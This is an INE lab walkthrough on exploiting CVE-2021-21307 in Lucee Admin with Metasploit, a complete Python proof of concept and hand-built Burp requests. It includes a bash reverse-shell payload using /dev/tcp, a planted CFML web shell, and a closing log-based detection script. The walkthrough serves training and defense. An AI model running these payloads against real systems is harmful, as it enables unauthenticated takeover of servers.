14 November 22

[CVE-2021-21307] Lucee Server Arbitrary File Write

Posted by INE

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Purpose: 

This lab shows how to exploit a vulnerable version of Lucee Server in three ways: with the Metasploit Framework, with a standalone Python script, and by hand with Burp Suite.

Technical difficulty: Beginner

Introduction

Lucee Server is a dynamic, Java-based (JSR-223) tag and scripting language used for rapid web application development. Lucee Admin before versions 5.3.7.47, 5.3.6.68 and 5.3.5.96 contains an unauthenticated remote code execution vulnerability. It is fixed in 5.3.7.47, 5.3.6.68 and 5.3.5.96 (one fix per release branch). As a workaround, block access to the Lucee Administrator (the /lucee/admin/ path) from untrusted networks.

This vulnerability has been assigned the CVE id CVE-2021-21307. The Base CVSS score for this vulnerability is 9.8 Critical.  

Reference: https://nvd.nist.gov/vuln/detail/CVE-2021-21307 

The vulnerability is an arbitrary file write in the Lucee Administrator's imgProcess.cfm page: the file query parameter is used as a path without sanitization, so a value containing ../ sequences writes the POSTed imgSrc content outside the thumbnail directory, including into the web context, where Lucee executes the written file as CFML.

In this lab, we will learn how to exploit the unauthenticated, remote code execution vulnerability in Lucee Administrator in a realistic environment and leverage it to gain shell access on the target server and retrieve the flag!

Lab Environment

In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of Lucee is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local:8888.  

Objective: Exploit the unauthenticated remote code execution (RCE) vulnerability in Lucee Admin to gain shell access on the target server and retrieve the flag present in the system's root directory!  

Lab Link: https://my.ine.com/INE/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/7c6514d9-a97a-4298-85bc-838ea4fab901 

Tools

The best tools for this lab are:  

- Nmap

- Curl

- Python

- A web browser

- Metasploit Framework

Step 1: Open the lab link to access the Kali GUI instance.  

Step 2: Check if the provided machine/domain is reachable.  

Command:  

ping -c3 demo.ine.local

The provided machine is reachable. 192.52.49.3 is the IP address of the target machine.

Step 3: Check open ports on the provided machine.  

Command:  

nmap -sS -sV demo.ine.local

Apache Tomcat 9.0.39 is running on port 8888 on the target machine.  

Step 4: Request a page that does not exist, so that the server answers with its error page.

Command:

http://demo.ine.local:8888/hdshgss.cfm 

The error page discloses the Lucee version: the target runs Lucee 5.3.7.43, which is older than the fixed 5.3.7.47 and therefore vulnerable.

Exploit using the Metasploit module

Step 5: First, check the attacker machine's IP address.

Command: 

ifconfig

192.52.49.2 is the attacker machine's IP address.

Step 6: Start the msfconsole and search for the desired module.

Commands:

msfconsole -q

search lucee

Step 7: The search returns the module we need. Select it and list the options it requires:

Commands: 

use exploit/linux/http/lucee_admin_imgprocess_file_write

show options

Step 8: Now run the following commands one by one:

Commands: 

set RHOSTS 192.52.49.3

set LHOST 192.52.49.2

check

exploit

Note that RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address; both values may differ in your environment.

We have successfully gained a command shell session.

Step 9: Read the flag.

Commands:

ls /

cat /flag.txt

FLAG: 7c5886ace9309cf2d23e6f556c79aa69 

Exploit using Python script

We will use the script available at the following URL:

URL: https://github.com/cyllective/CVEs/blob/master/CVE-2021-21307/poc.py 

The exploit has been provided by [cyllective](https://github.com/cyllective).

Step 10: From the terminal, save the following python code in a file named exploit.py. 

#!/usr/bin/env python3
"""
Title: Remote Code Exploit in Lucee Admin
CVE: CVE-2021-21307
Affected: < 5.3.7.47
Software: lucee/Lucee
Research:
  * rootxharsh
  * iamnoooob
PoC: cydave of cyllective AG
References:
  * https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
  * https://github.com/advisories/GHSA-wq6x-g685-w5f2
"""
import string
import random
import argparse
import requests
import urllib3

# Disable insecure https warnings (for self-signed SSL certificates)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", default="http://localhost:8888")  # base URL of the Lucee server
ap.add_argument("-s", "--host", required=True)                      # attacker IP for the reverse shell
ap.add_argument("-p", "--port", required=True, type=int)            # attacker listener port
args = ap.parse_args()

base_url = args.target.rstrip("/")


def random_string():
    return "".join(random.choices(string.ascii_lowercase, k=12))


# CFML page that spawns a bash reverse shell back to the attacker's listener
payload = f"""\
<cfset args="-c 'bash -i >& /dev/tcp/{args.host}/{args.port} 0>&1'">
<cfoutput>
<cfexecute
    name="bash"
    arguments="#preservesinglequotes(args)#"
    timeout="2">
</cfexecute>
</cfoutput>
"""

with requests.Session() as session:
    img_process_url = f"{base_url}/lucee/admin/imgProcess.cfm"
    response = session.get(img_process_url)
    if response.ok:
        print("[-] Target most likely not vulnerable.")
        exit()

    filename = random_string() + ".cfm"
    print("[*] Writing payload...")
    # The first request makes Lucee create the thumbnail directory; the second
    # traverses out of it to drop the payload into the web context served under /lucee/
    session.post(f"{img_process_url}?file=_/" + random_string(), data={"imgSrc": random_string()})
    session.post(f"{img_process_url}?file=_/../../../context/{filename}", data={"imgSrc": payload})

    try:
        print("[*] Triggering shell...")
        # The request blocks while the shell is connected, so a read timeout is expected
        session.get(f"{base_url}/lucee/{filename}", timeout=2)
    except requests.ReadTimeout:
        pass

Check what arguments are required:

Command:

python3 exploit.py -h

Step 11: Open a second terminal and start a netcat listener on port 5555.

Command:

nc -nvlp 5555

Step 12: From the first terminal, run the script along with the required arguments:

Command:

python3 exploit.py -t http://demo.ine.local:8888 -s 192.52.49.2 -p 5555

Note: Remember to change the host IP address (attacker machine's IP address) in the above command as it may vary for you.

Step 13: Check the second terminal. The exploit worked and we got shell access. 

Step 14: Read the flag.

Commands:

ls /

cat /flag.txt

FLAG: 7c5886ace9309cf2d23e6f556c79aa69 

Exploit using Burp Suite

Reference: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21307.yaml

Step 15: Start Burp Suite, go to the Repeater tab and paste the following HTTP request. Posting to imgProcess.cfm with a harmless file parameter makes Lucee create the thumbnail directory (/opt/lucee/web/temp/admin-ext-thumbnails); that directory must exist before the relative path in the next request can traverse out of it.

Request

POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
Host: demo.ine.local:8888
Content-Type: application/x-www-form-urlencoded

imgSrc=a

Step 16: Click on the pencil icon on the top right corner to configure target details as shown.

- Host: demo.ine.local

- Port: 8888 

Click OK and then hit Send.

Step 17: Replace the request in the Repeater with the following and hit Send. The file parameter traverses out of the thumbnail directory into the Lucee web context, and the imgSrc body becomes the content of randomfile.cfm: a small CFML web shell that runs whatever command is submitted through its form.

Request

POST /lucee/admin/imgProcess.cfm?file=/../../../context/randomfile.cfm HTTP/1.1
Host: demo.ine.local:8888
Content-Type: application/x-www-form-urlencoded

imgSrc=
<cfoutput>
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse> value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
</cfoutput>

Step 18: Now, let's try executing a command. Replace the request in the repeater with the following. 

Request

POST /lucee/randomfile.cfm HTTP/1.1
Host: demo.ine.local:8888
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

cmd=id&opts=&timeout=5

We are trying to execute the id command here. Hit Send. The exploit worked, and we got a valid response.
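From the defender's side, the three requests above leave a recognisable trace in the servlet container's access log. The following Python is an added example (not from the lab, the nuclei template or Lucee itself) that flags any imgProcess.cfm request whose file parameter resolves outside the thumbnail directory, even when the ../ sequences are URL-encoded, and then correlates it with later requests to the planted file under /lucee/. The log lines and status codes are constructed for the example, and the mapping from the context directory to the /lucee/ URL prefix follows the path pair used in Steps 17 and 18 rather than any Lucee documentation.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Tomcat-style access log lines (not real lab output; status codes are
# illustrative). Lines 1-3 model the three requests from Steps 15-18, line 4 is the
# same traversal URL-encoded, lines 5-6 are benign.
SAMPLE_LOG = """\
192.52.49.2 - - [14/Nov/2022:10:01:02 +0000] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 500 1204
192.52.49.2 - - [14/Nov/2022:10:01:05 +0000] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/randomfile.cfm HTTP/1.1" 500 1204
192.52.49.2 - - [14/Nov/2022:10:01:09 +0000] "POST /lucee/randomfile.cfm HTTP/1.1" 200 812
10.10.0.7 - - [14/Nov/2022:10:02:11 +0000] "GET /lucee/admin/imgProcess.cfm?file=..%2F..%2F..%2Fcontext%2Fx.cfm HTTP/1.1" 500 1204
10.10.0.8 - - [14/Nov/2022:10:03:00 +0000] "GET /lucee/admin/imgProcess.cfm?file=ext-123.png HTTP/1.1" 200 4410
10.10.0.9 - - [14/Nov/2022:10:04:00 +0000] "GET /index.cfm HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
IMG_PROCESS = "/lucee/admin/imgProcess.cfm"
# Assumption taken from Steps 17/18: a file written to .../context/<name> is served at /lucee/<name>.
CONTEXT_URL_PREFIX = "/lucee/"


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def resolved_file_target(file_param):
    """Decode the file parameter and resolve it against a virtual thumbnail directory.
    Returns the resolved path when it escapes that directory (a traversal), else None."""
    decoded = unquote(unquote(file_param))  # tolerate double URL-encoding
    base = "/thumbs"
    resolved = posixpath.normpath(base + "/" + decoded.lstrip("/"))
    if resolved == base or resolved.startswith(base + "/"):
        return None
    return resolved


def detect(log_text):
    """Return alerts: traversal writes via imgProcess.cfm, and later hits on the planted file."""
    alerts = []
    planted = {}  # URL path of a planted file -> source that wrote it
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path == IMG_PROCESS:
            for value in parse_qs(url.query).get("file", []):
                target = resolved_file_target(value)
                if target is None:
                    continue
                alerts.append({"kind": "traversal_write", "src": rec["src"],
                               "ts": rec["ts"], "target": target})
                if "/context/" in target:
                    rel = target.split("/context/", 1)[1]
                    planted[CONTEXT_URL_PREFIX + rel] = rec["src"]
        elif url.path in planted:
            alerts.append({"kind": "webshell_request", "src": rec["src"],
                           "ts": rec["ts"], "path": url.path,
                           "planted_by": planted[url.path]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Resolving the decoded parameter against a placeholder directory rather than grepping for "../" catches variants such as _/../../.. (the form the Metasploit module and the Python script use) and encoded dot segments alike; the priming request with file=/whatever is deliberately not alerted on, since a bare filename is what legitimate thumbnail requests look like.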

Conclusion

In this lab, we exploited the unauthenticated, remote code execution vulnerability in Lucee Admin using the Metasploit module, Python script, and Burp Suite. 

References

NVD CVE-2021-21307: https://nvd.nist.gov/vuln/detail/CVE-2021-21307

GitHub advisory GHSA-wq6x-g685-w5f2: https://github.com/advisories/GHSA-wq6x-g685-w5f2

Lucee Server

PoC (cyllective): https://github.com/cyllective/CVEs/blob/master/CVE-2021-21307/poc.py

Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21307.yaml

© 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.